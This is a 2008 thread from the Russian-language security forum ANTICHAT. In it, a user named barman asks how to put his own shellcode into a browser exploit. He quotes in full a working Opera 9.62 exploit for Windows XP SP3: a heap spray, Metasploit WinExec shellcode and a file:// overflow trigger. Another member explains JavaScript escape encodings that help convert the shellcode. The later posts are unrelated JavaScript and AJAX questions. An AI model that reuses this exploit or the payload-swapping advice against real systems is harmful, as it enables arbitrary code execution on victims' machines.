ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

09.12.2008, 13:43
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме: 3069349
Репутация:
808
|
|
Сообщение от barman
ето где Слева снизу
Вот этот пакер: http://dean.edwards.name/packer/, только он не предназначен для конвертации шелл-кода.
В JS примерно так же будет:
Код:
var code = '\x66\x81\xec\x80.....';
А уже после можно делать, что угодно - обфусцировать, сжимать, и т.п.
|
|
|

09.12.2008, 14:31
|
|
Новичок
Регистрация: 07.12.2008
Сообщений: 6
Провел на форуме: 25363
Репутация:
0
|
|
если так писать
Код:
var code = '\x66\x81\xec\x80.....';
то код не срабатывает,
сток много шелкодов на с а как их в html страницу зкинуть
|
|
|

09.12.2008, 14:58
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме: 3069349
Репутация:
808
|
|
Сообщение от barman
если так писать
Код:
var code = '\x66\x81\xec\x80.....';
то код не срабатывает,
сток много шелкодов на с а как их в html страницу зкинуть
Шеллкод и эксплоит - это не одно и то же.
|
|
|

09.12.2008, 15:17
|
|
Новичок
Регистрация: 07.12.2008
Сообщений: 6
Провел на форуме: 25363
Репутация:
0
|
|
так я и хочу узнать как етот код в експлоит засунуть, вместо запуска калькулятора
Код:
<html> <head><title>uh?</title></head> <body> <script> // k`sOSe 11/15/2008 // tested on Windows XP SP3, opera 9.62 international version // vulnerability found by send9 // there are many ways to achieve code execution, tons of function pointers to overwrite. // maybe there's one more reliable... var i=0; // push es, pop es var block = unescape("%u0607%u0607"); // metasploit WinExec c:\WINDOWS\system32\calc.exe var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100"); while (block.length < 81920) block += block; var memory = new Array(); for (;i<1000;i++) memory[i] += (block + shellcode); var evil = "file://"; for(var i = 0; i<16438; i++) evil += "X"; evil += "R."; window.location.replace(evil); </script> </body> </html>
,
шелкод есть но в таком формате
Код:
\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3
он не выполняется
Последний раз редактировалось barman; 09.12.2008 в 15:21..
|
|
|

09.12.2008, 17:58
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 128
Провел на форуме: 668329
Репутация:
106
|
|
используется javascript.
есть 10 файлов htm - в каждом одна новость (заголовок и текст).
можно ли циклом for вывести их содержимое на одну страницу (получилось только одну вывести)?
возможно ли вывести заголовки новостей на другую страницу, при нажатии на которые открывались бы сами новости?
интересует возможно ли такое сделать на javascript без php и mysql.
|
|
|

09.12.2008, 18:22
|
|
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме: 3578960
Репутация:
468
|
|
да можно, аяксом=)
|
|
|

09.12.2008, 18:39
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 128
Провел на форуме: 668329
Репутация:
106
|
|
если сервер не поддерживает php, то нужно устанавливать denwer, wamp, lamp и др.
javascript просто работает.
чтобы ajax работал, нужно ставить сервер?
|
|
|

09.12.2008, 18:43
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме: 3069349
Репутация:
808
|
|
вот примерно такое соответствие
Код:
'\x66'
'\u0066'
decodeURI('%66')
unescape('%u0066')
String.fromCharCode(0x66)
decodeURIComponent('%66')
|
|
|

09.12.2008, 18:56
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме: 3069349
Репутация:
808
|
|
Сообщение от UnPazz
если сервер не поддерживает php, то нужно устанавливать denwer, wamp, lamp и др.
javascript просто работает.
чтобы ajax работал, нужно ставить сервер?
Должно быть что-то, способное отдавать данные.
можно ли циклом for вывести их содержимое на одну страницу (получилось только одну вывести)?
Надо бы показывать хотя бы то, что получилось.
|
|
|

09.12.2008, 19:05
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 128
Провел на форуме: 668329
Репутация:
106
|
|
скоро покажу.
а можно форму отправить по email без php и без использования email клиента на стороне клиента? чтобы внешне было как обычная форма?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|